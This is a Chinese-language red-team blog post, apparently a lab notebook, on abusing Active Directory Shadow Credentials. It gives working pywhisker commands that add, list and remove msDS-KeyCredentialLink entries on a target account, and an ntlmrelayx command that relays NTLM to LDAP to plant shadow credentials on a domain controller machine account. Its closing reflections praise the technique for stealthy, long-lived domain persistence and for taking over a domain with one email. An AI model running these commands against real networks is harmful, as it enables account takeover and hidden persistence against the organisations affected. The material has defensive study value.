Shadow Credentials简单利用流水帐

0x00 前置条件

上周的测试记录，可能有错漏的地方，暂时不改发出来吧。

下面所有操作，尽在测试环境完成。仅供参考

• 谁能新增

• 域管
• KeyCredential Admins
• Acl高权限用户
• 机器账号给自己新增

• 给哪个受害者新增(高价值目标)

• 域用户(域管等)
• 域机器账号(DC/EX等)

0x01 攻击域用户

这里的win7是域管(之前某次测试中提权了)

• 新增msDS-KeyCredentialLink属性

//add
python3 pywhisker.py -d "bsec.corp" -u "win7" -p "your_password" --target "win10" --action "add" -o test1 --dc-ip dc3.bsec.corp

• 利用环节: 获取目标Win10 hash

• 列举和删除新增的KeyCredentialLink

//list
python3 pywhisker.py -d "bsec.corp" -u "win7" -p "your_password" --target "win10" --action "list" -o test1 --dc-ip dc3.bsec.corp
//del
python3 pywhisker.py -d "bsec.corp" -u "win7" -p "your_password" --target "win10" --action "remove" --device-id fcfce57f-eddb-e428-18c3-a844f750fc05 --dc-ip dc3.bsec.corp

0x02 攻击域内高价值机器账号

• 目标

• ex03: exchange机器账号

• 新增msDS-KeyCredentialLink属性

• 利用环节: 获取目标ex03 hash

• 测试权限

0x03 其他简单测试case

• 域控机器账号DC2$(AD CS)编辑win10的KeyCredentialLink
• 失败
• Ex机器账号Ex03$编辑win10的KeyCredentialLink
• 失败
• 域控机器账号DC2$(AD CS)编辑DC3$的KeyCredentialLink
• 失败
• 域普通用户win8编辑win8(自己)的KeyCredentialLink
• 失败
• 域机器用户iis$编辑iis$(自己)的KeyCredentialLink
• 成功

0x04 ntlm 中继添加msDS-KeyCredentialLink

• efs+webdav 打DC2$ (无签名)

默认server不会有webdav,我是之前测试刚好安装&启动了的

python3 ntlmrelayx.py  --shadow-credent --shadow-target 'dc2$' -t ldap://dc4 --remove-mic 

拿着pfx，玩法同上

• efs+smb(remove-mic 有签名) 打PC147-WIN7SP1$

• 邮件打域管理(无签名)-->打所有机器和域用户 (操作同之前文章)

• 全补丁域森林5秒沦陷？加密升级之信任雪崩

• 和其他relay操作类似, 前置条件ok的情况下打

0x05 图片来源及参考

• Relai NTLM
• pywhisker
• 协议库: pydsinternals
• Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover

0x06 思考

• 和委派之类操作测试，新增后，就获得一张长期饭票(不管目标密码怎么换)。权限维持还是很舒服的
• 比委派舒服的就是可以打用户&机器账号,场景更广,组合拳更多，并且还可以拿到ntlmhash.
• 拿着的证书有效期页很长, 隐秘性也还不错.
• 做域内权限驻留，目前肯定不错的，委派太多规则了。这个比较新.
• 不需要AD CS Web也有一些组合拳玩.
• 一封邮件过去, 可能域就拿下了. relay

0x07 最新动态

• 知识星球: 红蓝早读 (碎片记录)

• 公众号: 甲方安全建设 (整理沉淀)

• 作者: red4blue (交流讨论)

公众号增改字数和次数有限，防御检测策略，其它拓展思考，可能会留到群里讨论，留到星球沉淀.